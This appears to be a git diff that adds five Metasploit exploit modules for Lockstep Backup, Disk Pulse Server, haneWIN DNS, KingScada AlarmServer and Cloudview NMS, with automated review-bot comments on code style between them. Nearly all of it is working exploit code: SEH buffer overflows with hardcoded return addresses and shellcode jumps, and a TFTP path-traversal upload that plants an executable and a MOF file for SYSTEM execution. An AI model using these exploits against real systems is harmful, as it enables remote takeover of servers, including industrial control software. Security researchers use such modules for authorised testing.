@@ -0,0 +1,88 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lockstep Backup for Workgroups <= 4.0.3', + 'Description' => %q{ + This module exploits a stack buffer overflow found in + Lockstep Backup for Workgroups <= 4.0.3. The vulnerability + is triggered when sending a specially crafted packet that + will cause a login failure. + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'URL', 'http://secunia.com/advisories/50260/' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + 'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff", + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX', + }, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows 2000 ALL EN', + { + # msvcrt.dll + # pop ecx/ pop ecx/ retn + 'Ret' => 0x780146c0, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 11 2013')) + + register_options( + [ + Opt::RPORT(2125), + OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ]) + ], self.class ) + end + + def exploit + connect + + uname = datastore['USERNAME'] + + p = "\x90" * 16 + p << payload.encoded + + packet = rand_text_alpha_upper(10000) + packet[0, 8] = "BFWCA\x01\x01\x00" + packet[8, uname.length] = "#{uname}\x00" + packet[73, p.length] = p + packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8 + packet[7201, 4] = [target.ret].pack('V') + packet[7205, 8] = "\x90" * 8 + packet[7213, 2] = "\xff\xe7" # jmp edi + + print_status("Trying target %s..." % target.name) + + sock.put(packet) + + handler + disconnect + end + +end 
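Review bot: `'Name' => 'Lockstep Backup for Workgroups <= 4.0.3'` names the product only, with no vulnerability class, unlike every other module in this commit and unlike its files.csv row (`Lockstep Backup for Workgroups 4.0.3 - Buffer Overflow`); suggest `'Name' => 'Lockstep Backup for Workgroups <= 4.0.3 Buffer Overflow'`. The option text `'Username of victim'` is misleading — `packet[8, uname.length] = "#{uname}\x00"` shows it is the username the module itself places in the login request, so `'Username sent in the login request'` describes it. The Secunia reference URL may no longer resolve; keeping the advisory id (50260) visible in the text is worthwhile either way.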
diff --git a/platforms/windows/remote/42722.rb b/platforms/windows/remote/42722.rb
new file mode 100755
index 000000000..dabce3c41
--- /dev/null
@@ -0,0 +1,105 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found + in libpal.dll of Disk Pulse Server v2.2.34. The overflow + is triggered when sending an overly long 'GetServerInfo' + request to the service listening on port 9120. + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'BID', '43919' ], + [ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ], + [ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ] + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + }, + 'Payload' => + { + 'Space' => 300, + 'BadChars' => "\x00\x0a\x0d\x20", + 'DisableNops' => 'True', + 'StackAdjustment' => -3500, + 'Compat' => + { + 'SymbolLookup' => 'ws2ord', + } + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows XP SP3 EN', + { + # p/p/r + # libspp.dll + 'Ret' => 0x1006f71f, + 'Offset' => 303 + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 19 2010')) + + register_options([Opt::RPORT(9120)], self.class) + end + + def exploit + connect + + sploit = "GetServerInfo" + sploit << "\x41" * 8 + sploit << payload.encoded + sploit << "\x42" * (303 - (8 + payload.encoded.length)) + sploit << generate_seh_record(target.ret) + sploit << make_nops(4) + sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311 + sploit << rand_text_alpha_upper(200) + + print_status("Trying target #{target.name}...") + + sock.put(sploit) + + handler + disconnect + end + +end +__END__ +0033C05C 55 PUSH EBP +0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C] +0033C061 3AC2 CMP AL,DL 
+0033C063 74 14 JE SHORT libpal.0033C079 +0033C065 3C 0D CMP AL,0D +0033C067 74 10 JE SHORT libpal.0033C079 +0033C069 3C 0A CMP AL,0A +0033C06B 74 0C JE SHORT libpal.0033C079 +0033C06D 41 INC ECX +0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL +0033C071 47 INC EDI +0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI] +0033C075 84C0 TEST AL,AL +0033C077 ^75 E8 JNZ SHORT libpal.0033C061 +0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0 +0033C07D 5D POP EBP +0033C07E 5F POP EDI +0033C07F 890B MOV DWORD PTR DS:[EBX],ECX +0033C081 5E POP ESI +0033C082 B8 01000000 MOV EAX,1 +0033C087 5B POP EBX +0033C088 C3 RETN diff --git a/platforms/windows/remote/42723.rb b/platforms/windows/remote/42723.rb new file mode 100755 index 000000000..0c1b5e09c --- /dev/null +++ b/platforms/windows/remote/42723.rb 
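Review bot: The target hash declares `'Offset' => 303` but `exploit` never reads it; the value is repeated as a literal in `sploit << "\x42" * (303 - (8 + payload.encoded.length))`, so editing the target would silently leave the buffer layout unchanged — either read `target['Offset']` there or drop the key. The disassembly after `__END__` has no caption; a line such as `# libpal.dll listing referenced by the Description (presumably the copy loop) — kept for reference` above it would tell a reader why it is there. `'DisableNops' => 'True'` is a string where a boolean is meant.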
@@ -0,0 +1,74 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'haneWIN DNS Server Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in + haneWIN DNS Server <= 1.5.3. The vulnerability is triggered + by sending an overly long packet to the victim server. A memcpy + function blindly copies user supplied data to a fixed size buffer + leading to remote code execution. + + This module was tested against haneWIN DNS 1.5.3 + }, + 'Author' => [ 'james fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '31260' ], + [ 'OSVDB', '102773' ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1000, + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x20", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'DefaultTarget' => 0, + 'Targets' => + [ + [ + 'Windows 2000 SP4 EN / haneWIN DNS 1.5.3', + { + # msvcrt.dll v6.10.9844.0 + # pop esi/ pop edi/ retn + 'Ret' => 0x78010394, + } + ] + ], + 'DisclosureDate' => 'Jul 27 2013')) + + register_options([Opt::RPORT(53)], self.class) + end + + def exploit + connect + + p = make_nops(32) + payload.encoded + + buf = Rex::Text.pattern_create(5000) + buf[0, 2] = [0x4e20].pack('n') # length for malloc + buf[1332, p.length] = p + buf[2324, 8] = generate_seh_record(target.ret) + buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000 + + print_status("Sending malicious request...") + sock.put(buf) + disconnect + + end +end diff --git a/platforms/windows/remote/42724.rb b/platforms/windows/remote/42724.rb new file mode 100755 index 000000000..19b4b2221 --- /dev/null +++ b/platforms/windows/remote/42724.rb 
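Review bot: `'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"` hand-assembles the `add esp, -3500` that 42718.rb, 42722.rb and 42724.rb express as `'StackAdjustment' => -3500`; the framework option is self-describing and removes the need for the two stacked comments on that line. The `Description` ends with `This module was tested against haneWIN DNS 1.5.3`, which the target label `Windows 2000 SP4 EN / haneWIN DNS 1.5.3` already states; one of the two is redundant. The `Rank` is `NormalRanking` while every sibling here is `GreatRanking` or `ExcellentRanking` — if that is deliberate, a short comment on why (reliability on the tested platform, for instance) would help a reader.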
@@ -0,0 +1,78 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'KingScada AlarmServer Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow found in + KingScada < 3.1.2.13. The vulnerability is triggered when + sending a specially crafted packet to the 'AlarmServer' + (AEserver.exe) service listening on port 12401. During the + parsing of the packet the 3rd dword is used as a size value + for a memcpy operation which leads to an overflown stack buffer + }, + 'Author' => [ 'James Fitts' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2014-0787' ], + [ 'ZDI', '14-071' ], + [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0a\x0d\x20", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ + 'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4', + { + # dbghelp.dll + # pop esi/ pop edi/ retn + 'ret' => 0x02881fbf, + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 10, 2014')) + + register_options([Opt::RPORT(12401)], self.class) + end + + def exploit + connect + + p = payload.encoded + + buf = make_nops(5000) + buf[0, 4] = [0x000004d2].pack('V') + buf[4, 4] = [0x0000007b].pack('V') + buf[8, 4] = [0x0000133c].pack('V') # size for memcpy() + buf[1128, p.length] = p + buf[2128, 8] = generate_seh_record(target['ret']) + buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200 + + print_status("Trying target #{target.name}...") + + sock.put(buf) + + handler + disconnect + end + +end diff --git a/platforms/windows/remote/42725.rb b/platforms/windows/remote/42725.rb new file mode 100755 index 000000000..58c96043f --- /dev/null 
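Review bot: The target hash uses a lower-case `'ret'` key and `exploit` reads it with `target['ret']`, whereas every sibling module uses `'Ret'` and `target.ret`; the framework accessor is keyed on `Ret`, so normalising to `'Ret' => 0x02881fbf` and `generate_seh_record(target.ret)` keeps the modules uniform. The target label `WellinTech KingScada 31.1.1.4` looks like a typo next to the description's `KingScada < 3.1.2.13` — confirm the version string. `'DisclosureDate' => 'Apr 10, 2014'` carries a comma no other module here uses; `'Apr 10 2014'` matches them.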
+++ b/platforms/windows/remote/42725.rb 
@@ -0,0 +1,88 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Rex::Proto::TFTP + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + + def initialize(info={}) + super(update_info(info, + 'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Cloudview NMS server. The + software contains a directory traversal vulnerability that allows a remote + attacker to write arbitrary file to the file system, which results in + code execution under the context 'SYSTEM'. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'james fitts' ], + 'References' => + [ + ['URL', '0day'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'win', + 'Targets' => + [ + [ ' Cloudview NMS 2.00b on Windows', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 13 2014", + 'DefaultTarget' => 0)) + + register_options([ + OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]), + OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]), + OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ]) + ], self.class) + end + + def upload(filename, data) + tftp_client = Rex::Proto::TFTP::Client.new( + "LocalHost" => "0.0.0.0", + "LocalPort" => 1025 + rand(0xffff-1025), + "PeerHost" => datastore['RHOST'], + "PeerPort" => datastore['RPORT'], + "LocalFile" => "DATA:#{data}", + "RemoteFile" => filename, + "Mode" => "octet", + "Context" => {'Msf' => self.framework, "MsfExploit" => self }, + "Action" => :upload + ) + + ret = tftp_client.send_write_request { |msg| print_status(msg) } + while not tftp_client.complete + select(nil, nil, nil, 1) + tftp_client.stop + end + end + + def exploit + peer = "#{datastore['RHOST']}:#{datastore['RPORT']}" + + exe_name = rand_text_alpha(rand(10)+5) + '.exe' + exe = generate_payload_exe + mof_name = 
rand_text_alpha(rand(10)+5) + '.mof' + mof = generate_mof(mof_name, exe_name) + + depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH'] + levels = "../" * depth + + print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)") + upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe) + + select(nil, nil, nil, 1) + + print_status("#{peer} - Uploading .mof...") + upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) + end +end
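Review bot: `'Privileged' => false` contradicts the description, which says execution happens "under the context 'SYSTEM'"; one of the two is wrong, and `Privileged` is what the framework reports to users. In `upload`, `ret = tftp_client.send_write_request { |msg| print_status(msg) }` is assigned and never read, and the loop `while not tftp_client.complete … tftp_client.stop end` calls `stop` on every iteration, which reads as a mistake even if a one-second abort is intended — a comment stating the intent (and `until tftp_client.complete`) would settle it. `depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']` uses `or` inside a ternary condition (a precedence trap) and falls back to 10 while the option's documented default is 5. The target label `' Cloudview NMS 2.00b on Windows'` has a leading space.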